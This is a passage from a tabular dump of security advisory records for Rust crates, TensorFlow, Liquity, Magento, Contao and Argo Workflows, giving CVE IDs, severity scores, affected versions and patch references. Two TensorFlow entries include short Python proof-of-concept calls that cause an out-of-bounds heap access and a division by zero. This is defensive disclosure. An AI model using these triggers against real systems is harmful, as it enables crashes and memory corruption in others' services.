simple-slab crate before 0.3.3 for Rust. remove() has an off-by-one error, causing memory leakage and a drop of uninitialized memory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'simple-slab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35893'}, {'type': 'WEB', 'url': 'https://github.com/nathansizemore/simple-slab/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/nathansizemore/simple-slab/commit/5e0524c1db836e2192e1cd818848d96937c0b587'}, {'type': 'PACKAGE', 'url': 'https://github.com/nathansizemore/simple-slab'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0039.html'}]","{'cwe_ids': ['CWE-193'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-27qf-jwm8-g7f3,2021-08-24T18:17:31Z,2021-08-25T14:39:17Z,,['CVE-2021-37691'],FPE in LSH in TFLite,"### Impact +An attacker can craft a TFLite model that would trigger a division by zero error in LSH [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/lsh_projection.cc#L118). + +```cc +int RunningSignBit(const TfLiteTensor* input, const TfLiteTensor* weight, + float seed) { + int input_item_bytes = input->bytes / SizeOfDimension(input, 0); + // ... +} +``` + +There is no check that the first dimension of the input is non zero. + +### Patches +We have patched the issue in GitHub commit [0575b640091680cfb70f4dd93e70658de43b94f9](https://github.com/tensorflow/tensorflow/commit/0575b640091680cfb70f4dd93e70658de43b94f9). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick thiscommit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-27qf-jwm8-g7f3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37691'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/0575b640091680cfb70f4dd93e70658de43b94f9'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:17:31Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-8gf5-q9p9-wvmc,2021-08-19T18:48:32Z,2021-08-25T20:51:42Z,,['CVE-2020-36219'],Data race in atomic-option,"An issue was discovered in the atomic-option crate through 2020-10-31 for Rust. Because AtomicOption implements Sync unconditionally, a data race can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'atomic-option'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36219'}, {'type': 'WEB', 'url': 'https://github.com/reem/rust-atomic-option/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/reem/rust-atomic-option'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0113.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:48:32Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-w47j-hqpf-qw9w,2021-08-19T18:45:15Z,2021-08-25T20:52:59Z,,['CVE-2021-25901'],Out of bounds read in lazy-init,"An issue was discovered in the lazy-init crate through 2021-01-17 for Rust. Lazy lacks a Send bound, leading to a data race.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lazy-init'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25901'}, {'type': 'WEB', 'url': 'https://github.com/khuey/lazy-init/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/khuey/lazy-init'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0004.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:45:15Z', 'nvd_published_at': None}" +1.4.0,GHSA-pphf-f93w-gc84,2021-08-19T18:48:04Z,2021-08-25T20:51:47Z,,['CVE-2020-36217'],Data race in may_queue,"An issue was discovered in the may_queue crate through 2020-11-10 for Rust. Because Queue does not have bounds on its Send trait or Sync trait, memory corruption can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'may_queue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36217'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/may/issues/88'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/may'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0111.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:48:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-xh2p-7p87-fhgh,2021-07-29T20:43:48Z,2021-08-05T16:56:58Z,,[],Incorrect TCR calculation in batchLiquidateTroves() during Recovery Mode,"TCR is temporarily miscalculated in the `batchLiquidateTroves` function during Recovery Mode. + +The bug lies in [`batchLiquidateTroves` of `TroveManager`](https://github.com/liquity/dev/blob/7c83ea11378454629618b3808b16fbfda69ee3e5/packages/contracts/contracts/TroveManager.sol#L722). + +When calculating system's entire collateral, we should also exclude the liquidated trove's surplus collateral, since liquidation closes the trove and makes the surplus collateral claimable by the trove owner. This means, this line of code should look like this: +``` +vars.entireSystemColl = vars.entireSystemColl.sub(singleLiquidation.collToSendToSP).sub(singleLiquidation.collSurplus); +``` +### Impact + +The miscalculated entire collateral is used only to calculate the TCR and check if the system has been able to exit Recovery Mode. The miscalulation only persists temporarily, and within the`batchLiquidateTroves` transaction. Once the transaction completes the TCR and Recovery Mode will be calculated properly again. However, the bug could negatively impact the liquidation throughput and the gas efficiency gains from batching multiple liquidations in a single transaction. + +In normal situations, the impact of the collateral surplus of a Trove on the global TCR would be tiny. For instance, we have calculated that liquidating a trove with a collateral representing 1% of the total system collateral (so in the order of at least $10M at current values), would lead to an extra 0.53% in the temporary miscalculation of TCR. So for this bug to be meaningful, in such a scenario, the resulting real TCR must be already be very close to the Recovery Mode boundary anyway - i.e. between 149.47% and 150%. The batch liquidation transaction should also be executed with a particular trove ordering to achieve the TCR distortion. When a different trove order for the liquidation transaction is selected, the bug has no impact. In summary, the bug only has a non-negligible impact in a very narrow, specific set of circumstances. + +The potential effects of the bug after it occurs are: + +- The next trove in the sequence is not liquidated because the `batchLiquidateTroves` function calculates a premature exit from Recovery Mode. It could be liquidated in a subsequent transaction if the price of Ether doesn’t recover. +- The next trove in the sequence has an ICR below 100% and it’s offset against the Stability Pool instead of redistributed among other troves because the function calculates a premature exit from Recovery Mode. For this to happen, the Ether price must have instantly plummeted by more than 10% (otherwise, the trove would have been already liquidated before). +- The next trove in the sequence is liquidated while its ICR is over the real TCR: the function calculates the TCR as being slightly too high, and thus can liquidate a trove that has ICR less than the calculated TCR, but greater than the true TCR. This is probably the worst outcome - however it is already possible to achieve the same effect, regardless of the bug. A liquidator can craft a `batchLiquidateTroves` transaction whereby they select troves for liquidation such that the TCR increases and makes a given trove liquidateable. To liquidate trove A, they can order troves such that they first liquidate troves which raise the TCR to between A's ICR and 150%. This is intended and expected behavior. As clearly stated in Liquity documentation, to be completely safe and guarantee immunity from liquidation in Recovery Mode, borrowers should keep their ICR above 150%. + +We don't believe this bug creates a profitable exploit. Theoretically, and only in a very narrow set of circumstances, a liquidator could try to send a batch liquidation during Recovery Mode that lets the system very temporarily return to Normal Mode earlier than it should. In that case - _and only if the Ether price also happens to suddenly plummet by more than 10%_ - stability providers might take the haircut that should be taken by the borrowers (through redistribution). + +### Patches +The problem has been patched in the source code but not on mainnet contracts. Liquity protocol is immutable, and this issue is not critical, so it doesn't merit a launch of a new version. + +### Bug bounty + +A reward of $1,000 (the maximum for its category) was awarded to Xiahong (`gaoxh06`) for reporting this bug. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [our repo](https://github.com/liquity/dev) +* Email us at [security@liquity.org](mailto:security@liquity.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@liquity/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/liquity/dev/security/advisories/GHSA-xh2p-7p87-fhgh'}, {'type': 'WEB', 'url': 'https://github.com/liquity/dev/commit/c69d0bae30b5457e89724d880851a03ba7477905'}, {'type': 'WEB', 'url': 'https://github.com/liquity/dev/blob/7c83ea11378454629618b3808b16fbfda69ee3e5/packages/contracts/contracts/TroveManager.sol#L722'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@liquity/contracts'}]","{'cwe_ids': ['CWE-682'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-07-29T20:43:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-hpv4-7p9c-mvfr,2021-08-23T23:20:28Z,2021-08-25T14:43:21Z,,['CVE-2021-37651'],Heap buffer overflow in `FractionalAvgPoolGrad`,"### Impact +The implementation for `tf.raw_ops.FractionalAvgPoolGrad` can be tricked into accessing data outside of bounds of heap allocated buffers: + +```python +import tensorflow as tf + +tf.raw_ops.FractionalAvgPoolGrad( + orig_input_tensor_shape=[0,1,2,3], + out_backprop = np.array([[[[541],[541]],[[541],[541]]]]), + row_pooling_sequence=[0, 0, 0, 0, 0], + col_pooling_sequence=[-2, 0, 0, 2, 0], + overlapping=True) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/fractional_avg_pool_op.cc#L205) does not validate that the input tensor is non-empty. Thus, code constructs an empty `EigenDoubleMatrixMap` and then accesses this buffer with indices that are outside of the empty area. + +### Patches +We have patched the issue in GitHub commit [0f931751fb20f565c4e94aa6df58d54a003cdb30](https://github.com/tensorflow/tensorflow/commit/0f931751fb20f565c4e94aa6df58d54a003cdb30). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hpv4-7p9c-mvfr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37651'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/0f931751fb20f565c4e94aa6df58d54a003cdb30'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T23:20:28Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-r98r-j25q-rmpr,2023-08-25T00:12:20Z,2021-08-25T20:46:38Z,,['CVE-2019-25010'],Rust Failure Crate Vulnerable to Type confusion,"Safe Rust code can implement malfunctioning `__private_get_type_id__` and cause type confusion when downcasting, which is an undefined behavior. + +Users who derive Fail trait are not affected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'failure'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25010'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang-nursery/failure/issues/336'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang-nursery/failure'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0036.html'}]","{'cwe_ids': ['CWE-843'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-3vjm-36rr-7qrq,2021-08-19T21:18:36Z,2021-08-25T20:47:16Z,,['CVE-2020-35860'],NULL Pointer Dereference in cbox,An issue was discovered in the cbox crate through 2020-03-19 for Rust. The CBox API allows dereferencing raw pointers without a requirement for unsafe code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35860'}, {'type': 'WEB', 'url': 'https://github.com/TomBebbington/cbox-rs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/TomBebbington/cbox-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0005.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-26rr-v2j2-25fh,2021-08-30T16:42:41Z,2021-08-30T17:20:52Z,,['CVE-2021-32758'],Layout XML Arbitrary Code Fix ,"### Impact +Layout XML enabled admin users to execute arbitrary commands via block methods.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-26rr-v2j2-25fh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32758'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/b99307d00b59c4a226a1e3e4083f02cf2fc8fce7'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13'}]","{'cwe_ids': ['CWE-91'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T16:42:41Z', 'nvd_published_at': '2021-08-27T18:15:00Z'}" +1.4.0,GHSA-hq5m-mqmx-fw6m,2023-04-25T16:37:13Z,2021-08-23T19:41:22Z,,['CVE-2021-37627'],Privilege escalation via form generator,"### Impact + +It is possible for untrusted users to gain administrator rights with the form generator. + +Installations are only affected if there are untrusted back end users with access to the form generator. + +### Patches + +Update to Contao 4.4.56, 4.9.18 or 4.11.7. + +### Workarounds + +Disable the form generator or disable the login for untrusted back end users. + +### References + +https://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator + +### For more information + +If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.56'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.9.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.11.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-hq5m-mqmx-fw6m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37627'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:52:36Z', 'nvd_published_at': '2021-08-11T23:15:00Z'}" +1.4.0,GHSA-fhv4-fx3v-77w6,2023-06-13T20:31:29Z,2021-08-25T20:52:05Z,,['CVE-2021-28036'],quinn invalidly assumes the memory layout of std::net::SocketAddr,"The quinn crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'quinn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'quinn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28036'}, {'type': 'WEB', 'url': 'https://github.com/quinn-rs/quinn/issues/968'}, {'type': 'PACKAGE', 'url': 'https://github.com/quinn-rs/quinn'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0035.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:25:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-ch4f-829c-v5pw,2021-08-23T18:58:49Z,2021-08-25T14:43:56Z,,['CVE-2021-37642'],Division by 0 in `ResourceScatterDiv`,"### Impact +The implementation of `tf.raw_ops.ResourceScatterDiv` is vulnerable to a division by 0 error: + +```python +import tensorflow as tf + +v= tf.Variable([1,2,3]) +tf.raw_ops.ResourceScatterDiv( + resource=v.handle, + indices=[1], + updates=[0]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/resource_variable_ops.cc#L865) uses a common class for all binary operations but fails to treat the division by 0 case separately. + +### Patches +We have patched the issue in GitHub commit [4aacb30888638da75023e6601149415b39763d76](https://github.com/tensorflow/tensorflow/commit/4aacb30888638da75023e6601149415b39763d76). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-ch4f-829c-v5pw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37642'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4aacb30888638da75023e6601149415b39763d76'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:58:49Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-h563-xh25-x54q,2021-08-30T23:23:11Z,2021-08-09T20:37:50Z,,['CVE-2021-37914'],Workflow re-write vulnerability using input parameter,"### Impact + +* Allow end-users to set input parameters, but otherwise expect workflows to be secure. + +### Patches + +Not yet. + +### Workarounds + +* Set `EXPRESSION_TEMPLATES=false` for the workflow controller + + +### References + +* https://github.com/argoproj/argo-workflows/issues/6441 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [example link to repo](http://example.com) +* Email us at [example email address](mailto:example@example.com) +",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37914'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/issues/6441'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/pull/6285'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/pull/6442'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/commit/2a2ecc916925642fd8cb1efd026588e6828f82e1'}, {'type': 'PACKAGE', 'url': 'github.com/argoproj/argo-workflows/v3'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-04T18:26:07Z', 'nvd_published_at': '2021-08-03T00:15:00Z'}" +1.4.0,GHSA-28ph-f7gx-fqj8,2021-08-19T21:08:12Z,2021-08-25T20:47:57Z,,['CVE-2020-35867'],Data races in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via create_module.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35867'}, {'type': 'WEB', 'url': 